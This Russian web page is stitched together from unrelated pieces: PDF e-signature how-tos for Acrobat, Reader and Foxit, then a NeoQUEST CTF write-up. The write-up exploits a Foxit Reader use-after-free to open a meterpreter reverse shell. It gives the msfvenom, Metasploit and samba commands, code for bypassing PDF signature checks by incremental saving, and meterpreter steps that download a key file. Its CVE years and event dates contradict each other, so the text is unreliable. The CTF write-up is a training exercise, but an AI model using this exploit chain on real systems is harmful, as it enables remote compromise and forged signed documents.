Как подписать PDF в Foxit Reader? – про компьютеры – ПО, железо, интернет

Как подписать PDF в Foxit Reader? - про компьютеры - ПО, железо, интернет Электронная цифровая подпись

Cоздание простой подписи в pdf-ридерах – ассоциация учителей информатики

  

Если установлена программа adobe acrobat

  1. После шага 3 в программе Adobe Acrobat откроется новое окно. Выберите в нем вкладку «Инструменты», перейдите в раздел «Формы и подписи» и нажмите на кнопку «Сертификаты».
  1. Выберите один из двух типов подписи:
  • Цифровая подпись отображается в документе в поле подписи, которое вы сами выбираете, и на панели «Подписи». Ее можно использовать многократного подписания документа PDF, например, для согласования разделов, комментирования или добавления записей.
  • Сертифицирующая подпись удостоверяет документ PDF. С ней можно разрешить или запретить дальнейшее изменение документа. Для подписания документа применяется один раз, и только если в нем нет других цифровых подписей. Сертифицирующая подпись бывает видимой и невидимой.

Выберите подпись во вкладке «Сертификаты».

  1. Если вы выбрали цифровую или сертифицирующую видимую подпись откроется информационное окно:

Нажмите на кнопку «Перетащить прямоугольник для новой подписи».

Если выбрали сертифицирующую невидимую подпись, информационного окна не будет. Переходите сразу к 10 шагу.

  1. В окне «Сохранить как сертифицированный документ» нажмите на кнопку «ОК».
  1. Выделите область для отображения электронной подписи в документе.
  1. В следующем окне выберите сертификат и нажмите на кнопку «ОК».
  1. В окне «Подпись с помощью цифрового удостоверения» нажмите на кнопку «Продолжить».
  1. В открывшемся окне для формирования цифровой подписи нажмите на кнопку «Подписать».

Если вы выбрали сертифицирующую подпись, в вашем окне будет поле «Просмотр содержимого документа, которое может повлиять на подписание». Нажмите под ним на кнопку «Просмотр», а затем на кнопку «Подписать».

  1. В окне «Сохранить как PDF» укажите имя документа и тип файла. Нажмите на кнопку «Сохранить».
  1. Когда подписание закончится, появится соответствующее уведомление.

Отлично! Вы успешно подписали документ PDF в программе Adobe Acrobat с помощью модуля КриптоПро PDF. Нажмите на кнопку «ОК» в уведомлении, чтобы закрыть окно.

Теперь вы можете отправить подписанный документ на согласование, контрагентам или использовать его по другому назначению.

Каждый вид подписи в документе будет выглядеть по-разному:

Если вы выбрали цифровую подпись, в документе она будет выглядеть так:

Если вы выбрали сертифицирующую видимую подпись, она будет выглядеть следующим образом:

Если вы выбрали сертифицирующую невидимую подпись, она будет отображаться так:

Все скриншоты представлены для Adobe Acrobat версии DC. В других версиях программы могут быть незначительные отличия в интерфейсе.

Если установлена программа adobe reader

  1. Нажмите на вкладку «Дополнительные инструменты».
  1. В открывшемся окне нажмите на кнопку «Сертификаты».
  1. В информационном окне нажмите на кнопку «Перетащить прямоугольник для новой подписи».
  1. Выделите в документе область, в которой вы хотите, чтобы отображалась электронная подпись.

Например:

  1. После выделения области откроется окно, где нужно выбрать сертификат, которым будет подписан документ.

Нажмите на кнопку «ОК».

  1. В окне «Подпись с помощью цифрового удостоверения» проверьте верный ли сертификат вы указали. Затем нажмите на кнопку «Продолжить».
  1. В открывшемся окне нажмите на кнопку «Подписать».
  1. В окне «Сохранение» укажите имя для подписанного документа и тип файла.

Нажмите на кнопку «Сохранить».

  1. Когда подписание закончится, появится уведомление:

Отлично! Вы успешно подписали документ PDF в программе Adobe Reader с помощью модуля КриптоПро PDF. Нажмите на кнопку «ОК» в уведомлении, чтобы закрыть окно.

Теперь вы можете отправить подписанный документ на согласование, контрагентам или использовать его по другому назначению.

Подпись в документе будет выглядеть так:

Все скриншоты представлены для Adobe Acrobat Reader DC версии 2020.013.20066. В других версиях программы могут быть незначительные отличия в интерфейсе.

Как вырезать страницы из pdf в foxit reader?

Запустите Foxit Reader и откройте в нем pdf-документ. Просматривая документ, выберите страницы, которые вы хотите извлечь и сохранить отдельно. Отправьте выбранные страницы на печать Файл -> Печать (File -> Print).

Как изменить свойства файла pdf?

Создание свойств документа

  1. Выберите меню «Файл» > «Свойства», а затем выберите пункт «Заказные».
  2. Чтобы добавить свойство, введите имя и значение, а затем нажмите кнопку «Добавить».
  3. Чтобы изменить свойства, выполните любое из следующих действий, а затем нажмите кнопку «ОК».

Как изменить текст в pdf foxit reader?

Как редактировать PDF-документ в Foxit PhantomPDF

  1. Откройте документ.
  2. Щелкните вкладку «Правка».
  3. Нажмите кнопку «Изменить текст» в верхней центральной части экрана.
  4. Чтобы изменить текст, просто найдите его и щелкните, чтобы выделить его, затем введите новый текст.
  5. Чтобы удалить его, выделите текст, который хотите удалить, и нажмите клавишу Backspace.

Как изменить текст в pdf?

Выберите Инструменты > Редактировать PDF > Добавить текст . Откройте документ PDF и выберите «Инструменты» > «Редактировать PDF» > «Добавить текст». Нажмите и перетащите указатель мыши, чтобы определить ширину добавляемого текстового блока.

Как объединить pdf файлы в один в foxit reader?

Чтобы произвести объединение пдф файлов, необходимо запустить программу и в закладке «Конвертировать» выбрать «Из файлов», а в дополнительном меню выбрать «Из нескольких файлов». В появившемся окошке выбираем пункт «Объединить несколько файлов в один PDF-файл» и выбираем объединяемые файлы.

Как подписать документ эцп в формате sig?

Создать файл SIG

  1. кликните правой кнопкой мыши на вашем файле который нужно подписать (рис.1) далее из выпадающего меню выбираем КриптоАРМ (рис.2) и далее выбираем Подписать (рис.3)
  2. у нас открывается мастер создания ЭЦП и нам нужно только нажать Далее

Как подписать электронной цифровой подписью pdf файл?

Чтобы подписать документ PDF:

  1. В Adobe Reader перейдите в «Инструменты» — «Сертификаты»;
  2. Выберете необходимый тип электронной подписи;
  3. Выделите область для отображения подписи;
  4. Выберете нужный сертификат из списка;
  5. Нажмите «Подписать»;
  6. Сохраните документ.

Как поставить защиту на pdf файл?

Добавление пароля к документу PDF

  1. Откройте документ PDF в Acrobat DC.
  2. Выберите Файл > Защитить паролем. Также можно выбрать Инструменты > Защита > Защитить паролем.
  3. Выберите этот параметр, если хотите установить пароль для просмотра или редактирования PDF.
  4. Дважды введите пароль. …
  5. Нажмите кнопку Применить.

Как поставить пароль на pdf foxit reader?

Поставить пароль на pdf можно конечно же и в любом редакторе pdf. Например, в Foxit PhantomPDF переходим на вкладку «Защита», выбираем пункт «Защита паролем» и устанавливаем необходимые пароли на пдф.

Как редактировать pdf файл в foxit phantompdf?

Редактирование pdf файлов программой Foxit PhantomPDF

  1. При выборе пункта меню «Редактировать объектТекст» на листе будет выделяться только текст отдельными маленькими блоками, и получится, что каждое слово придется редактировать отдельно.
  2. Выбрав «Редактировать объектИзображение» мы получим возможность выделять и редактировать только рисунки в данном документе.

Как сделать свою подпись на компьютере?

Вставка строки подписи

  1. Щелкните в том месте, где нужно поместить строку подписи.
  2. На вкладке Вставка нажмите кнопку Строка подписи
  3. Щелкните Строка подписи Microsoft Office.
  4. В окне Настройка подписи можно ввести имя в поле Предлагается для подписания. …
  5. Нажмите кнопку ОК.

Как уменьшить размер файла pdf в foxit reader?

Сжать файл PDF вы можете и в Adobe Acrobat DC, но не в бесплатном Adobe Reader. 1. Открыв документ в «Акробате», кликните по пункту меню «Файл», затем выберите «Сохранить как другой» и щелкните по строчке «Файл PDF уменьшенного размера».

Как уменьшить размер файла в adobe reader?

Дополнительная опция для уменьшения размера файла PDF

  1. Откройте один файл PDF или выберите один или несколько файлов PDF в портфолио PDF.
  2. Выберите Файл > Сохранить как другой > Файл PDF уменьшенного размера.
  3. Выберите требуемую совместимость версий.

Пошаговая инструкция для подписания документа в формате pdf

  1. Откройте документ PDF с помощью Adobe Reader или Adobe Acrobat. В меню программы выберите «Редактирование» — «Установки».
  1. В окне «Установки» среди представленных категорий выберите «Подписи». С правой стороны окна в разделе «Создание и оформление» нажмите на кнопку «Подробнее».
  1. В окне «Установки» среди представленных категорий выберите «Подписи». С правой стороны окна в разделе «Создание и оформление» нажмите на кнопку «Подробнее».

Не уверены, что хотите, чтобы все подписи формировались с помощью модуля КриптоПро PDF? Укажите параметр «Спрашивать при подписании». С ним при создании каждой новой подписи вы сможете выбрать метод исполнения электронной подписи.

Нажмите на кнопку «ОК».

Дальнейшая работа зависит от того, какая программа установлена на вашем компьютере.

Эксплуатируем уязвимость foxit reader и обходим цифровую подпись на примере задания neoquest-2020

Эксплуатируем уязвимость Foxit Reader и обходим цифровую подпись на примере задания NeoQUEST-2020

Как подписать PDF в Foxit Reader? - про компьютеры - ПО, железо, интернет

Сегодня мы расскажем о самом сложном задании NeoQUEST-

2021

2020. Да-да, то самое, с цифровыми подписями и эксплуатацией уязвимости Foxit Reader. Да-да, все верно, существуют две версии этого задания, и в этой статье мы наконец как следует его разберем. Добро пожаловать под кат 🙂

Изначально задание было разработано для очной ставки NeoQUEST-2021 , однако так и осталось непокоренным непройденным. Мы его немного видоизменили и предложили решить участникам онлайн-этапа NeoQUEST-2020 . Однако на сложность задания наши изменения не повлияли — его прошли всего 2 человека!
Итак, первая версия предусматривала прохождение в локальной сети, а вторая в глобальной сети интернет, для чего необходимо провести некоторые манипуляции с эксплоитом и его шеллкодом.
В легенде NeoQUEST-2020 был дан IP-адрес, при переходе по которому участники видели форму отправки заявлений, а также список требований к ним и пример корректного заявления. Первым делом внимательно изучим пример заявления: вдруг там будет что-то интересное? И правда, сразу же замечаем деталь:
Как подписать PDF в Foxit Reader? - про компьютеры - ПО, железо, интернет

Похоже, здесь используется Foxit Reader 9.0.1. Нам дано название ПО и его версия, хммм… Может, речь идет о какой-то уязвимости? И мы абсолютно правы: эта версия имеет use-after-free уязвимость, получившую идентификатор CVE-2021-9958. Эксплойт для уязвимости есть в Metasploit (что уже половина успеха, не правда ли?), почему бы не попробовать?
Эта уязвимость позволяет скачивать файлы с удаленной шары. Рассмотрим эксплуатацию данной уязвимости на примере оригинального задания 2021 года.

Итак, в 2021 году форма отправки заявлений находилась по адресу 192.168.108.129. Первым делом запускаем Kali Linux. Также нужно поднять шару, с которой будет запускаться основная полезная нагрузка – Meterpreter. Для этого скачиваем/обновляем samba-сервер:

sudo apt-get install samba

Затем создаем папку, которую будем шарить:

mkdir /mnt/files sudo chmod 777 /mnt/files 

Теперь нужно сконфигурировать samba-сервер. Для этого следует открыть конфигурационный файл /etc/samba/smb.conf и вставить туда следующий текст:

[global] security = user workgroup = MYGROUP server string = Samba guest account = nobody map to guest = Bad User  [share] path = /mnt/files browseable = Yes guest ok = Yes writeable = Yes public = yes 

Последнее, что нужно сделать – перезапустить службы samba:

service smbd restart service nmbd restart 

Вот и все. Теперь содержимое папки /mnt/files доступно по адресу 192.168.108.130share.

Следующий шаг – подготовка самого эксплойта. Для этого сконфигурируем Meterpreter и положим его на шару:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.108.130 LPORT=4444 --arch x86 -f exe -o /mnt/files/exploit.exe sudo chmod 777 /mnt/files/exploit.exe 

Теперь создадим PDF-файл с эксплойтом:

msfconsole use exploit/windows/fileformat/foxit_reader_uaf set LHOST 192.168.108.130 set EXENAME exploit.exe set SHARE share run 

Включаем обработчик, который будет устанавливать связь с Meterpreter, когда он запустится на машине-жертве:

use multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.108.130 set EXITONSESSION false run -j 

Вот и все! В версии задания 2020 года так проэксплутировать не выйдет (только если у вас нет внешнего IP, на котором вы можете поднять smb шару). Поэтому для прохождения этого задания в online-этапе необходимо проанализировать эксплоит и в качестве шеллкода залить свою полезную нагрузку, реализующую, например, reverse (если есть внешний IP) или bind shell. Предлагаем самостоятельно попробовать проэксплуатировать уязвимость, ведь лучше один раз сделать самому, чем сто раз прочитать!

Осталось загрузить созданный PDF-документ в систему приема заявлений, и…
Как подписать PDF в Foxit Reader? - про компьютеры - ПО, железо, интернет
…ничего не происходит, так как файл не подписан! Похоже, система проверяет подпись какими-то дополнительными средствами перед тем, как документ открывается в Foxit Reader. Следовательно, нужно придумать, как обойти проверку подписи.

Три наиболее свежих техники обхода подписи для PDF-файлов имеют идентификаторы CVE-2021-16042, CVE-2021-18688 и CVE-2021-18689. К счастью, группа исследователей, обнаружившая эти уязвимости, опубликовала примеры PDF-файлов для проверки. Проверим, как система будет реагировать на каждую атаку.
Атака Universal Signature Forgery: Реакция системы такая же, как и на неподписанный файл. Похоже, подпись не распознается.
Атака Signature Wrapping: Тот же результат, атака не работает.
А вот атака Incremental Saving Attack:
Как подписать PDF в Foxit Reader? - про компьютеры - ПО, железо, интернет
Мы почти у цели! Система проверила подпись и сообщила, что она не принадлежит сотруднику компании. Но у нас есть пример документа с подписью сотрудника! Значит, все, что остается – проявить ловкость рук и использовать Incremental Saving, чтобы встроить эксплойт, не сломав при этом подпись.

Можно самостоятельно написать библиотеку для низкоуровневой работы с pdf (как задумывал разработчик задания) или просто дописать эксплоит в конец (как сделал тестировщик, когда проходил задание). Если взглянуть на структуру PDF-эксплойта, становится ясно, что он состоит из двух объектов: JS-кода, вызывающего use-after-free и запускающего exe-файл на шаре, и каталога – основного объекта в PDF-файле – задающего в качестве действия при открывании документа вызов JS-кода. Значит, нужно добавить объект с JS-кодом в подписанный документ, а также обновить объект каталога. Сделать это можно следующим образом:

doc = PDF('example.pdf') js_exploit = "...тут много JS-кода..."  obj_1 = Object({'OpenAction': ObjectReference(28),                 'AcroForm': ObjectReference(15),                 'Pages': ObjectReference(1),                 'PageLayout': '/OneColumn',                 'Type': '/Catalog'                 }, id=13) doc.update_object(obj_1, 1)  obj_2 = Object({'S': '/JavaScript',                 'JS': js_exploit                 }) doc.add_new_object(obj_2)  doc.save(root_id=13) 

Что мы видим? Документ успешно проходит проверку подписи! После этого устанавливается новая сессия с Meterpreter, а значит, эксплойт срабатывает (иногда это происходит не с первого раза из-за вероятностной природы use-after-free).

Как подписать PDF в Foxit Reader? - про компьютеры - ПО, железо, интернет

Теперь можно использовать Meterpreter, чтобы найти и скачать файл nq2020_key.txt:

sessions -i 1 search -f nq2020_key.txt download 'C:UsersmanagerDownloads
q2020_key.txt

Ура

звучат фанфары и аплодисменты

! Мы наконец-то получили ключ! Было сложно, но для наших участников нет ничего невозможного — мы убеждаемся в этом уже который год!

Мы рассказали все секреты заданий online-этапа NeoQUEST-2020, но это вовсе не означает, что мы с вами в этом году не увидимся: 30го сентября состоится традиционная Очная ставка в Санкт-Петербурге!

Мы проведём финал хакерского соревнования, а также расскажем о самых интересных новостях в мире кибербезопасности. Крутые доклады, познавательные воркшопы, telegram-викторина, подарки и многое другое — все это ждет вас уже скоро! До встречи 🙂

Читайте также:  Что такое электронная подпись — простым языком для новичков мира цифровой экономики - Единый портал ЭП
Оцените статью
ЭЦП Эксперт
Добавить комментарий

Adblock
detector